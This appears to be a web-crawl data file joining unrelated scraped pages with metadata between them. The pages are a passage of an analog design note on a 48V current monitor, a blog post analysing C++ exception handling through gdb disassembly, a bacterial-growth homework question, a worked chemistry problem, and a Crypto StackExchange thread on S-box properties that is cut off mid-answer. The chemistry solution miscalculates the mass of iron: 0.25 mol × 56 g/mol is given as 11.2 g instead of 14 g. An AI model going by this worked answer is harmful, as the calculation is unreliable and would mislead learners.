the 48V monitored current and the 5V monitor circuit. To minimize errors induced by U1's gain resistor, zener Z1 and resistor RSHUNT clamp U1's operating voltage to a nominal 3.0V. U1's maximum operating current (ICC) is 55µA, so the maximum value for RSHUNT is:\n\nRSHUNTMAX = (VINMIN - VZ1MAX)/(ICCMAX + IZ1MIN)\n= (42V - 2.7V)/(55µA + 100µA) = 249kΩ\nWhere IZ1MIN is the minimum current required for a flat zener characteristic, VINMIN is the input voltage, and VZ1MAX is the zener tolerance.\n\nFor the connections shown in Figure 1, the voltage drop across ROUT equals the drop across RSENSE. For a maximum full-scale (FS) voltage of 100mV across RSENSE, you choose ROUT to set the magnitude of the corresponding full-scale output current. This ROUT selection involves a tradeoff, however. Higher current minimizes the effect of error current induced by the voltage drop across the two 25kΩ resistors between IN+ and REF. The percentage error introduced by this effect is lower for higher output currents.\n\nOn the other hand, higher current levels can create over-voltage in U2, and they waste power. A good trade-off seems to be 350µA. Thus, ROUT = 100mV/350µA = 286Ω (287Ω is the closest standard value). At 3.0V operation, the maximum error current induced by the resistor load is 3.0V/50kΩ = 60µA, or 17%. This may seem a bit high, but a simple calibration routine can subtract most of the effects of this error, yielding a negligible effect on the calibrated result. A common pnp transistor (MMBT3906) is chosen as the level translator. Operating at 350µA and close to 45V VCE, the transistor's power dissipation is very low (< 20mW).\n\nThe 10kΩ digital potentiometer U2 (MAX5402) adjusts the current monitor's gain. U2 has a simple up/down interface and a low value of nominal end-to-end resistance (10kΩ). Worst-case variations in the initial tolerance, supply voltage, and temperature yield a maximum end-to-end resistance of 12.5kΩ. Adding a 60µA error current to the 350µA full-scale signal current selected above yields the maximum output current from Q1: 350µA + 60µA = 410µA. Multiplying this current by the maximum end-to-end resistance yields:\n\nMax voltage on pin \"H\" of the MAX5402 = 410µA × 12.5kΩ = 5.12V\nU2 specifies an absolute maximum voltage of 6V at pin H, so you must select the full-scale signal current sufficiently low to avoid over-voltage at pin H.\n\nThe technique presented allows use of a 5V (maximum) difference amplifier in a 48V application, and the circuit can be modified as required for lower or higher common-mode voltages. The use of Q1 to transform the signal voltage to a current allows easy gain adjustment with a digital potentiometer. The digipot shown (MAX5402) can divide the full-scale signal magnitude by factors as high as 32. Such gain adjustment is useful for automotive battery monitoring, and other applications in which the monitored current varies over a wide dynamic range.\n\nIt's important to provide separate grounds for the digital potentiometer and the op amp. It is also important not to connect these grounds to earth ground. Otherwise, that connection places the digital potentiometer in parallel with the op-amp circuit, causing the resistance at VOUT (relative to ground) to vary with the voltage at VIN." ]
[ null, "https://www.analog.com/-/media/analog/en/landing-pages/design-notes/highvoltage-programmablegain-current-monitor/4546fig01.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86078435,"math_prob":0.959689,"size":4447,"snap":"2022-40-2023-06","text_gpt3_token_len":1091,"char_repetition_ratio":0.13234301,"word_repetition_ratio":0.0028288544,"special_character_ratio":0.2340904,"punctuation_ratio":0.10221675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.968308,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T13:25:17Z\",\"WARC-Record-ID\":\"<urn:uuid:2449a2b1-d5f5-451e-b430-8c698a9b5a7f>\",\"Content-Length\":\"53170\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:90023f95-5f2e-4253-be3d-799f8d37e788>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e1f97d9-81e9-41c9-99e6-dd1c92e2dea4>\",\"WARC-IP-Address\":\"23.221.59.96\",\"WARC-Target-URI\":\"https://www.analog.com/jp/design-notes/highvoltage-programmablegain-current-monitor.html\",\"WARC-Payload-Digest\":\"sha1:63IGEBETHOG6PPZ3W7MDOBDOCOCK66DO\",\"WARC-Block-Digest\":\"sha1:M47B5TBOKG3VWI6NKIONXAXVVD3VJRF4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499871.68_warc_CC-MAIN-20230131122916-20230131152916-00788.warc.gz\"}"}
http://seegive.blogspot.com/2012/01/c-exception-internals.html
[ "## Friday, January 27, 2012\n\n### C++ exception internals\n\nIn this post, we'll try to analyze the internals of how exception handling works in C++. Actually, I thought this should be pretty straightforward, given the simplicity of the usage of exceptions in C++. I was wrong. Quite a lot of interesting stuff happens internally, which wasn't very obvious for me at first. So, let's go find out.\n\nSo, what is the big deal with exception handling ?\n\nThere is one big deal at-least. When an exception is thrown, the exception handling mechanism has to unwind all stacks until it finds a stack which handles it. So, let's first focus on this section of exception handling: throwing an exception.\n\n1. Throwing an exception:\n\nclass A {\npublic:\nA() {}\n~A() {}\n};\n\nclass B {\npublic:\nB() {}\n~B() {}\n};\n\nclass C {\npublic:\nC() {}\n~C() {}\n};\n\nvoid function1() {\nA a;\nB b;\nC c;\n}\n\nint main() {\nfunction1();\nreturn 0;\n}\n\nfunction1() is our main function of interest here. So, let's disassemble it. Below is the assembly code for it.\n\n(gdb) disassemble function1\nDump of assembler code for function function1():\n0x080484e4 <+00>:    push   %ebp\n0x080484e5 <+01>:    mov    %esp,%ebp\n0x080484e7 <+03>:    sub    \\$0x28,%esp\n0x080484ea <+06>:    lea    -0xb(%ebp),%eax\n0x080484ed <+09>:    mov    %eax,(%esp)\n0x080484f0 <+12>:    call   0x804859c <A::A()>\n0x080484f5 <+17>:    lea    -0xa(%ebp),%eax\n0x080484f8 <+20>:    mov    %eax,(%esp)\n0x080484fb <+23>:    call   0x80485a8 <B::B()>\n0x08048500 <+28>:    lea    -0x9(%ebp),%eax\n0x08048503 <+31>:    mov    %eax,(%esp)\n0x08048506 <+34>:    call   0x80485b4 <C::C()>\n0x0804850b <+39>:    lea    -0x9(%ebp),%eax\n0x0804850e <+42>:    mov    %eax,(%esp)\n0x08048511 <+45>:    call   0x80485ba <C::~C()>\n0x08048516 <+50>:    lea    -0xa(%ebp),%eax\n0x08048519 <+53>:    mov    %eax,(%esp)\n0x0804851c <+56>:    call   0x80485ae <B::~B()>\n0x08048521 <+61>:    lea    -0xb(%ebp),%eax\n0x08048524 <+64>:    mov    %eax,(%esp)\n0x08048527 <+67>:    call   0x80485a2 <A::~A()>\n0x0804852c <+72>:    leave\n0x0804852d <+73>:    ret\nEnd of assembler dump.\n\nOkay. All is fine here. Things are pretty straight forward. Constructors for classes A, B and C are called. Their respective destructors are called in the reverse order. None of the constructors or destructors throw an exception here. So, no problems here. Note the leave and ret instructions at the end of the function. They indicate a normal function return, meaning they get executed when we encounter a return statement ( return 10; ) in C / C++.\n\nNow let's modify class \"C\" as below:\n\nclass C {\npublic:\nC() {\nthrow 1;\n}\n~C() {}\n};\n\nC::C() has changed as below. We call a couple of special functions here __cxa_allocate_exception and  __cxa_throw. We'll cover more on what these functions do later. For now, its just enough to know that they're getting called, when we throw an exception.\n\n(gdb) disassemble C::C()\nDump of assembler code for function C::C():\n0x0804874c <+00>:    push   %ebp\n0x0804874d <+01>:    mov    %esp,%ebp\n0x0804874f <+03>:    sub    \\$0x18,%esp\n0x08048752 <+06>:    movl   \\$0x4,(%esp)\n0x08048759 <+13>:    call   0x8048560 <__cxa_allocate_exception@plt>\n0x0804875e <+18>:    movl   \\$0x1,(%eax)\n0x08048764 <+24>:    movl   \\$0x0,0x8(%esp)\n0x0804876c <+32>:    movl   \\$0x804a040,0x4(%esp)\n0x08048774 <+40>:    mov    %eax,(%esp)\n0x08048777 <+43>:    call   0x8048570 <__cxa_throw@plt>\nEnd of assembler dump.\n\nNow, something unexpected has happened here. The code in function1() has changed too, even though we haven't touched a bit in it. Below is the updated function1().\n\ngdb) disassemble function1\nDump of assembler code for function function1():\n0x08048654 <+00>:    push   %ebp\n0x08048655 <+01>:    mov    %esp,%ebp\n0x08048657 <+03>:    push   %ebx\n0x08048658 <+04>:    sub    \\$0x24,%esp\n0x0804865b <+07>:    lea    -0xb(%ebp),%eax\n0x0804865e <+10>:    mov    %eax,(%esp)\n0x08048661 <+13>:    call   0x8048734 <A::A()>\n0x08048666 <+18>:    lea    -0xa(%ebp),%eax\n0x08048669 <+21>:    mov    %eax,(%esp)\n0x0804866c <+24>:    call   0x8048740 <B::B()>\n0x08048671 <+29>:    lea    -0x9(%ebp),%eax\n0x08048674 <+32>:    mov    %eax,(%esp)\n0x08048677 <+35>:    call   0x804874c <C::C()>\n0x0804867c <+40>:    lea    -0x9(%ebp),%eax\n0x0804867f <+43>:    mov    %eax,(%esp)\n0x08048682 <+46>:    call   0x804877c <C::~C()>\n0x08048687 <+51>:    lea    -0xa(%ebp),%eax\n0x0804868a <+54>:    mov    %eax,(%esp)\n0x0804868d <+57>:    call   0x8048746 <B::~B()>\n0x08048692 <+62>:    lea    -0xb(%ebp),%eax\n0x08048695 <+65>:    mov    %eax,(%esp)\n0x08048698 <+68>:    call   0x804873a <A::~A()>\n0x080486a0 <+76>:    pop    %ebx\n0x080486a1 <+77>:    pop    %ebp\n0x080486a2 <+78>:    ret\n0x080486a3 <+79>:    mov    %eax,%ebx\n0x080486a5 <+81>:    lea    -0xa(%ebp),%eax\n0x080486a8 <+84>:    mov    %eax,(%esp)\n0x080486ab <+87>:    call   0x8048746 <B::~B()>\n0x080486b0 <+92>:    lea    -0xb(%ebp),%eax\n0x080486b3 <+95>:    mov    %eax,(%esp)\n0x080486b6 <+98>:    call   0x804873a <A::~A()>\n0x080486bb <+103>:    mov    %ebx,%eax\n0x080486bd <+105>:    mov    %eax,(%esp)\n0x080486c0 <+108>:    call   0x8048590 <_Unwind_Resume@plt>\n\nEnd of assembler dump.\n\nNote, that there is some new section of instructions ( in bold ), added after the ret instruction. Looks like some calls to destructors have been added here. Let's analyze on what this exactly means.\n\nvoid function1() {\nA a;\nB b;\nC c;\n}\n\nNow, in the above function, when C c; is read by the compiler, it sees that C's constructor throws an exception. So, it does the following in this case:\n\n1.\nIn case, if C::C() throws an exception at run-time, it indirectly means that objects a and b have already been constructed successfully. In which case, they SHOULD BE destroyed. So, the compiler inserts calls to call B::~B() and A::~A() ( remember the reverse order ).\n\n2. Also, if C::C() throws an exception at run-time, then object c is not considered to be fully constructed. In that case, it need not be destructed, meaning C::~C() need not be called. So, the compiler doesn't bother about C::~C(). Hence, no calls to C::~C() in the above new code.\n\n3. Since, we are in red alert, we need to convey this to the caller of function1() ( which is main() here ) too. So, the compiler calls\n_Unwind_Resume function to continue the same steps in the parent function. Note that _Unwind_Resume is perfectly placed in the end of the function, so a sequential execution will pick it up, which means we're not going by the normal leave / ret code path here. We're using a secondary code path.\n\nThis is the secret behind how compilers propagate exceptions and unwind stacks. The compiler analyzes the code while compiling, and adds extra code to handle exceptions. This means extra work and extra compile time. This also implies that your library / executable might get a little bigger than normal.\n\nOkay, we covered the simple case of class C throwing an exception. Let's deal with a little more complex case. What happens when constructors A, B and C, all of them could possibly throw an exception ? This means that all 3 of them have the code which could trigger an exception at run-time. We won't know until run-time, who will throw one. The compiler has to generate code in function1() to accommodate all the cases. The expected behavior is listed below:\n\n1. At run-time, if A's constructor throws an exception, then we should just exit the stack frame, without calling any destructor.\n\n2. If B's constructor throws an exception, then we should only call A's destructor.\n\n3. If C's constructor throws an exception, then we should call the destructors of both A and B.\n\nBelow is the assembly code generated when all 3 constructors throw an exception. The initial section of function1() has been trimmed of, since it's the same here too.\n\n(gdb) disassemble function1\nDump of assembler code for function function1():\n...\n\n...\n0x080486a0 <+76>:    pop    %ebx\n0x080486a1 <+77>:    pop    %ebp\n0x080486a2 <+78>:    ret\n0x080486a3 <+79>:    mov    %eax,%ebx\n0x080486a5 <+81>:    lea    -0xa(%ebp),%eax\n0x080486a8 <+84>:    mov    %eax,(%esp)\n0x080486ab <+87>:    call   0x804879e <B::~B()>\n0x080486b0 <+92>:    jmp    0x80486b4 <function1()+96>\n0x080486b2 <+94>:    mov    %eax,%ebx\n0x080486b4 <+96>:    lea    -0xb(%ebp),%eax\n0x080486b7 <+99>:    mov    %eax,(%esp)\n0x080486ba <+102>:    call   0x8048768 <A::~A()>\n0x080486bf <+107>:    mov    %ebx,%eax\n0x080486c1 <+109>:    mov    %eax,(%esp)\n0x080486c4 <+112>:    call   0x8048590 <_Unwind_Resume@plt>\nEnd of assembler dump.\n\nIf we look into the code above, we could easily sort out the answers by plain reasoning. E.g. To solve (1), jump directly from A's constructor to address 0x080486bf ( so that we don't fall in the line of the calls to B::~B() and A::~A() ). For (2), jump directly from B's constructor to address 0x080486b0 ( so that we fall in the line of the call to A::~A() and not B::~B() ). For (3), jump directly from C's constructor to address 0x080486a3 ( so that we fall in the line of the calls to A::~A() and B::~B() ).\n\nOne might quickly guess, that these addresses can be hard-coded in the constructors to close this whole issue. But, this won't work since these objects ( and their constructors ) might be used in a lot of places, not only in function1(). So, it becomes obvious that this mechanism of finding the address to jump to, should be dynamic. And the code for doing that should be in one of __cxa_allocate_exception or  __cxa_throw, since they are the one's being called once an exception is thrown. Decent guess. So, let's explore what each one of them does a bit.\n\nTill now, we've not answered a question. When we do a 'throw someObject;' how is someObject accessible in a different stack frame ? The stack where the exception originated is already gone .. right ?\n\nCorrect. The exception is not allocated in the stack. It is allocated in the freestore. __cxa_allocate_exception is the guy responsible for allocating it. How can you verify it ? Simple. Let's modify the exception thrown by A's constructor a bit. Rather doing a \"throw 1\", we'll throw an object, which has a big size, and see where it gets allocated.\n\nclass Memory {\nprivate:\nint a_[ 1024 * 1024 ];\npublic:\nMemory() {\na_[ 1024 ] = 0xaaaabbbb;\n}\n};\n\nclass A {\npublic:\nA() {\nthrow Memory();\n}\n~A() {\n}\n};\n\nHere, we've created a class Memory, whose size is 4 Mbytes ( sizeof(int) * 1024 * 1024 ). Now, let's analyze the constructor of A() to see where does it allocate this object.\n\nDump of assembler code for function A::A():\n0x0804878a <+00>:    push   %ebp\n0x0804878b <+01>:    mov    %esp,%ebp\n0x0804878d <+03>:    push   %ebx\n0x0804878e <+04>:    sub    \\$0x14,%esp\n0x08048791 <+07>:    movl   \\$0x400000,(%esp)\n0x08048798 <+14>:    call   0x80485a0 <__cxa_allocate_exception@plt>\n0x0804879d <+19>:    mov    %eax,%ebx\n0x0804879f <+21>:    mov    %ebx,(%esp)\n0x080487a2 <+24>:    call   0x8048778 <Memory::Memory()>\n0x080487a7 <+29>:    movl   \\$0x0,0x8(%esp)\n0x080487af <+37>:    movl   \\$0x8048918,0x4(%esp)\n0x080487b7 <+45>:    mov    %ebx,(%esp)\n0x080487ba <+48>:    call   0x80485b0 <__cxa_throw@plt>\nEnd of assembler dump.\n\nIf the exception Memory() was allocated in the stack, the value of %esp would have been decremented by 4 Mbytes approximately. It's not. %esp is just decremented by \\$0x14 ( 20 bytes ). So, the Memory() object was not allocated in the stack. If we move our focus on the line in bold, things should be obvious. A value of 4 Mbytes, is passed as an argument to __cxa_allocate_exception function. So, it's this function that allocates the exception dynamically as the name suggests. Still not convinced. Try a simple trick. Break in __cxa_allocate_exception in gdb. Analyze the memory usage of the program ( pmap -x <pid> ). Run the 'finish' command in gdb to complete the execution of __cxa_allocate_exception. Now analyze the memory. It should have increased by 4 Mbytes.\n\nSo, __cxa_allocate_exception is responsible for allocation. It returns the allocated address ( in %eax, the return value register ), where the Memory() object is constructed. After this, we call __cxa_throw. 0x8(%esp) is the 3rd argument. 0x4(%esp) is the 2nd argument. (%esp) is the 1st argument.  In short, we call\n\n__cxa_throw( Memory()'s this pointer, Memory()'s typeinfo, 0 )\n\nSo, by elimination if __cxa_allocate_exception only takes care of exception memory allocation, then __cxa_throw is the guy who knows the jumping logic. This is the function where all the trick should happen, logically. This function knows where exactly to land in the previous stack call frame ( function1() in our case ), so that it will avoid calling the wrong destructors.  At this point, I'm too not clear on how it does this. Will defer it for now.\n\n2. Catching an exception:\n\nCatching is pretty trivial. Whenever we catch an exception, we either have the choice to end the misery, or to propagate ( aka re-throwing ) it with a smile on the face. If you're propagating, then refer to the previous section. If you've handled the exception, go to sleep ;-)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7629542,"math_prob":0.8728287,"size":22926,"snap":"2019-51-2020-05","text_gpt3_token_len":7221,"char_repetition_ratio":0.19732136,"word_repetition_ratio":0.88941634,"special_character_ratio":0.39740905,"punctuation_ratio":0.19796404,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.965452,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T05:46:03Z\",\"WARC-Record-ID\":\"<urn:uuid:4fd555b3-01b8-4b9e-957e-31deaea81fd2>\",\"Content-Length\":\"92468\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6d68d5ed-cb75-4f4d-ac19-3e3bb8677960>\",\"WARC-Concurrent-To\":\"<urn:uuid:63717d7d-65ac-47fb-ab71-333655438260>\",\"WARC-IP-Address\":\"172.217.164.161\",\"WARC-Target-URI\":\"http://seegive.blogspot.com/2012/01/c-exception-internals.html\",\"WARC-Payload-Digest\":\"sha1:RVG46BQ4FJRQ44RDHMAB3VPDCF24PJOW\",\"WARC-Block-Digest\":\"sha1:EKJMJP5UIK7SWKRAR7DDZBCI5NRD55XO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540584491.89_warc_CC-MAIN-20191214042241-20191214070241-00118.warc.gz\"}"}
https://web2.0calc.com/questions/i-need-to-create-an-exponential-growth-decay-model
[ "+0\n\n# I need to create an exponential growth/decay model using the simplified form of y=ab^x for the given problem.\n\n0\n99\n1\n\nTwo bacteria are discovered at the bottom of a shoe. If the bacteria multiply at a rate of 34% per hour, how many bacteria will be present after 48 hours?\n\n-The percentage needs to be converted into a decimal and then put into the equation.\n\nDec 4, 2018\nedited by Guest  Dec 4, 2018" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9129309,"math_prob":0.94389254,"size":324,"snap":"2019-26-2019-30","text_gpt3_token_len":93,"char_repetition_ratio":0.15,"word_repetition_ratio":0.0,"special_character_ratio":0.33333334,"punctuation_ratio":0.12987013,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98184264,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-21T17:55:40Z\",\"WARC-Record-ID\":\"<urn:uuid:f300d890-7c36-46e3-9a88-be3559c44b0c>\",\"Content-Length\":\"21887\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7976fc21-c492-4044-b9e3-4a10a11c020b>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a8464e5-dd56-481f-808c-e1e7e92a64ed>\",\"WARC-IP-Address\":\"144.76.186.3\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/i-need-to-create-an-exponential-growth-decay-model\",\"WARC-Payload-Digest\":\"sha1:LLMVLRVZ5GY5H5PIJ2SFYKQNOXINM7EH\",\"WARC-Block-Digest\":\"sha1:FCM5PZH6UUC6U4CWD34GR3XDJHELSRAR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195527089.77_warc_CC-MAIN-20190721164644-20190721190644-00079.warc.gz\"}"}
https://www.univerkov.com/calculate-the-mass-of-iron-that-is-formed-by-the-interaction-of-20-g-of-iron-iii-oxide-with-50-g-of-aluminum/
[ "# Calculate the mass of iron that is formed by the interaction of 20 g of iron (III) oxide with 50 g of aluminum.\n\nGiven:\n\nm (Fe2O3) = 20 g\n\nm (Al) = 50 g\n\nFind:\n\nm (Fe) -?\n\nSolution:\n\n1) We compose the reaction equation corresponding to the condition of the problem:\n\nFe2O3 + 2Al = 2Fe + Al2O3;\n\n2) Find the amount of iron oxide and aluminum:\n\nn (Fe2O3) = m: M = 20 g: 160 g / mol = 0.125 mol\n\nn (Al) = m: M = 50 g: 27 g / mol = 1.85 mol\n\nWe carry out calculations, substituting a smaller value in order to get more accurate calculations. We work with Fe2O3:\n\n3) We compose a logical expression:\n\nif 1 mol of Fe2O3 gives 2 mol of Fe in the reaction,\n\nthen 0.125 mol of Fe2O3 will give a mol of Fe in the reaction x,\n\nthen x = 0.25 mol.\n\n4) Find the mass of iron released during the reaction:\n\nm (Fe) = n * M = 0.25 mol * 56 g / mol = 11.2 g;\n\nAnswer: m (Fe) = 11.2 grams.", null, "One of the components of a person's success in our time is receiving modern high-quality education, mastering the knowledge, skills and abilities necessary for life in society. A person today needs to study almost all his life, mastering everything new and new, acquiring the necessary professional qualities." ]
[ null, "https://www.univerkov.com/01.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.858976,"math_prob":0.9971964,"size":1193,"snap":"2023-40-2023-50","text_gpt3_token_len":359,"char_repetition_ratio":0.114381835,"word_repetition_ratio":0.008438818,"special_character_ratio":0.32942164,"punctuation_ratio":0.14068441,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9849041,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T20:14:32Z\",\"WARC-Record-ID\":\"<urn:uuid:05616c8a-257f-4fef-823f-468b6e0882d8>\",\"Content-Length\":\"25614\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8323eafa-1584-4e59-a551-09bb5148e0a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a067fb8-3c61-44ee-95d5-f74f76143176>\",\"WARC-IP-Address\":\"37.143.13.208\",\"WARC-Target-URI\":\"https://www.univerkov.com/calculate-the-mass-of-iron-that-is-formed-by-the-interaction-of-20-g-of-iron-iii-oxide-with-50-g-of-aluminum/\",\"WARC-Payload-Digest\":\"sha1:EAWRICZ4YQJ37NJF5K5JV3XQKFGXSJK3\",\"WARC-Block-Digest\":\"sha1:7TUOIKOX2AVSXZIYVWGP3SUAV3WN6LGQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511220.71_warc_CC-MAIN-20231003192425-20231003222425-00433.warc.gz\"}"}
https://crypto.stackexchange.com/questions/1297/desirable-s-box-properties?noredirect=1
[ "# Desirable S-box properties\n\nWhat desirable properties should an S-box have?\n\nMy current standard selection process is to just pick them at random and verify that they fit the following criteria:\n\n• The probability that any random two bits $S[a]_b$ and $S[c]_d$ are equal (for any random $a$, $b$, $c$ and $d$) is 50%.\n• The probability that any random two bits $S[a]_n$ and $a_n$ are equal (for any random $a$ and $n$) is 50%.\n• No entries exist such that $S[a] = a$\n• No entries exist such that $S[a] = \\bar{a}$\n\nAre there any other important properties that need to be applied?\n\nEdit My reasons for asking are that I wish to combine this S-Box design with a CBC mode cipher as discussed on this question.\n\n• My rational is that S[a] = a provides no benefit and S[a] = !a will always maintain the same bit \"pattern\" as its input. Since the idea of an S-box is to provide \"confusion\" (as defined by Shannon), it seems reasonable to ensure that neither of these cases are allowed. I may, however, be incorrect. – Polynomial Nov 23 '11 at 14:41\n• The output of the cipher has the avalanche property and appears random, but the construction of the S-box is not random. It's a case of not allowing any correlation, rather than specifying that a particular output is not allowed. – Polynomial Nov 23 '11 at 14:52\n• this seems to be a good paper about s-box: sans.org/reading_room/whitepapers/vpns/… – woliveirajr Nov 23 '11 at 15:00\n• It doesn't really explain why they made the choices they did, though. It just says \"this is the S-box and these are the choices we made\". I'm really looking for answers that provide both an explanation of the facts and the reasoning behind making the choices. – Polynomial Nov 23 '11 at 15:05\n• – woliveirajr Nov 23 '11 at 15:20\n\nThe following information about the DES S-Box might be useful (taken from here):\n\nDES Design Criteria\n\n• there were 12 criterion used, resulting in about 1000 possible S-Boxes, of which the implementers chose 8\n\n• these criteria are CLASSIFIED SECRET\n\n• however, some of them have become known\n\nThe following are design criterion:\n\nR1: Each row of an S-box is a permutation of 0 to 15\n\nR2: No S-Box is a linear of affine function of the input\n\nR3: Changing one input bit to an S-box results in changing at least two output bits\n\nR4: S(x) and S(x+001100) must differ in at least 2 bits\n\nThe following are said to be caused by design criteria\n\nR5: S(x) [[pi]] S(x+11ef 00) for any choice of e and f\n\nR6: The S-boxes were chosen to minimize the difference between the number of 1's and 0's in any S-box output when any single input is held constant\n\nR7: The S-boxes chosen require significantly more minterms than a random choice would require\n\nFor Rijndael, things were different as the S-Box in Rijndael had to meet certain requirements mathematically and cryptanalytically\n\n• Could you explain criteria R5 and R7, please? And is criteria R2 essentially \"No S[x] must exist for x where the result is a rotation of x, e.g. 01010010 -> 10010100\"? – Polynomial Nov 24 '11 at 6:58\n• @Polynomial: There are many more linear and affine functions than just rotations. Basically, R2 says (assuming the mean linear/affine over $\\{0,1\\}$) that no S-box may be writable as $S(x) = a_0 \\oplus a_1x_1 \\oplus \\dotsb \\oplus a_nx_n$, where $x_1 \\dotsc x_n$ are the bits of $x$ and $a_0 \\dotsc a_n$ are arbitrary bitstrings. – Ilmari Karonen Nov 24 '11 at 12:16\n\n# Desirable Properties\n\nFor simplicity, I’m skipping some of the details here… but the main criteria of a good s-box are:\n\n• It should have balanced component functions,\n• The non-linearity of its component functions should be high,\n• The non-zero linear combinations of its component functions should be balanced and highly non-linear,\n• It should satisfy SAC (strict avalanche criterion),\n• It should have a high algebraic degree.\n\nYet, it’s hardly possible to achieve all those goals 100%. Nevertheless, there is somewhat of a consensus on what properties an “Ideal S-Box Properties” would possess…\n\n# Ideal S-Box Properties\n\n• All linear combinations of s-box columns are bent.\n• All entries in the s-box XOR table are 0 or 2.\n• The s-box satisfies MOSAC (aka „Maximum order SAC“).\n• The s-box satisfies MOBIC (aka “Maximum order BIC”).\n• The set of weights of rows has a binomial distribution with mean $$m / 2$$.\n• The set of weights of all pairs of rows has a binomial distribution with mean $$m / 2$$.\n• The columns each have Hamming weight $$2^{(n− 1)}$$.\n\nAt least, that would be the expected properties in an ideal world.\n\nPractically, making sure s-boxes satisfy all desired properties is hard already and working towards satisfying all “ideal” properties is definitely a goal, but chances are you might not reach all “ideal” goals to your fullest satisfaction. Especially when cryptography isn’t your day job where you happen to have plenty of R&D resources to back your efforts.\n\nI guess this also explains to you why they call it “designing” s-boxes. Fact is, you can’t just throw some shuffled byte-values into a 2D array and expect s-box creation to be completed. An s-box is a part of the cipher you create it for. An s-box is meant to add security. Depending on the individual cipher algorithm design, a low-quality s-box can break the neck of each and every person that might use the cipher. Therefore, it’s utterly important that you don’t mess things up along the lines of “oh, that 2D array of values looks random enough to me”.\n\n# Make No Mistake – S-Boxes Are Not Random\n\nYou have to realize that the most important thing an s-box adds to a block cipher is “non-linearity“. And you can trust in the fact that the chances that you’ll manage to create a good s-box randomly by using your current criteria are very minimal… very, very minimal!\n\nSee, an s-box is not just a randomly permuted set of values (may it be bits, words, integers, or whatever) with some equalized bits to make it look somewhat balanced. Creating s-boxes can be seen as a mathematical design step. It involves working with and checking on things like boolean functions, truth tables, hamming weights, the distance between the function and the set of all affine functions, etc.\n\nIn short: an s-box is not something you quickly wrap up in an afternoon, and it’s certainly not something you can create “randomly” or with the specifics you’ve defined. The reason is simple: your whole block cipher depends on the non-linearity and other characteristics of that s-box. Such s-boxes are rare, while the rest of potential combinations is either linear or completely distinguishable from randomness. As you might have read here and there: if an adversary can pinpoint one or more distinguishers, the adversary gains knowledge that can potentially be used to successfully break a way into your ciphertext. Cipher algorithms using s-boxes rely on s-box non-linearity to be secure. If you replace the s-box(es) without knowing what you’re doing, you’re risking to break a once perfectly secure cipher by removing its heart.\n\nPlease, do not simply create a random s-box that fits your listed criteria and throw it into some cipher algorithm. The chance that you introduce a wide-open door for attackers is too big to even consider it.\n\n# Literature\n\nTo be sure you get the right idea about what an s-box is and how s-boxes are created, I would like to point you to the following papers:\n\nPersonally, I'd like to advise you to start reading “The Design Of S-Boxes” by Cheung, as that will most probably make it easier for you to grasp the whole concept… while getting a clear picture of what you might already know and what you still need to do some research on. After all, there are dozens of papers out there that handle s-box design. Depending on your personal knowledge level, you’ll surely find yourself reading additional papers that handle certain specifics of s-box design and analysis.\n\n### Get The Picture\n\nIf you want to dive in head-first and quickly see what I’m talking about, visit YouTube at “Mod-01 Lec-17 Overview on S-Box Design Principles” where Prof. Mukhopadhyay (Department of Computer Science and Engineering, IIT Kharagpur) roughly explains it. Even if you can’t follow him, it’ll surely give you a good, first impression why s-box design is a bit more complicated than randomly shuffling an array.\n\n• I have not seen an s-box that satisfies SAC, the target is to minimize the distance from SAC in the negative direction, and maximize the number of entries in the strict avalanche table that meet or exceed $2^{n-1}$ – Richie Frame Sep 2 '14 at 3:45\n• @RichieFrame Honestly, it doesn’t surprise me you haven’t seen them yet (for example: DES and AES s-boxes don’t satisfy SAC). But nevertheless, I think we’re talking somewhat about the same thing here. See, I never said all criteria can be attained to their maximum effect. It’s well known that we can’t achieve all good properties we would like. In practice, we have to decide which properties are more important. (As D.W. correctly noted in his answer: it depends on the application.) But that doesn’t change the list of desirable properties. – e-sushi Sep 2 '14 at 15:29\n• What do you mean by \"component functions\"? – Melab Jan 19 '18 at 2:12\n• @Melab Component functions are the linear combinations (with non all-zero coefficients) of the coordinate functions of the S-box. Their set is the vector space spanned by the coordinate functions, deprived of the null function if the coordinate functions are F2-linearly independent. For further reading, use your favorite search engine and look for \"s-box component functions\". – e-sushi Jan 19 '18 at 5:05\n\nIt depends on how you plan to use your S-box. Presumably you are going to use your S-box in some block cipher. In that case, you have to look at what properties you 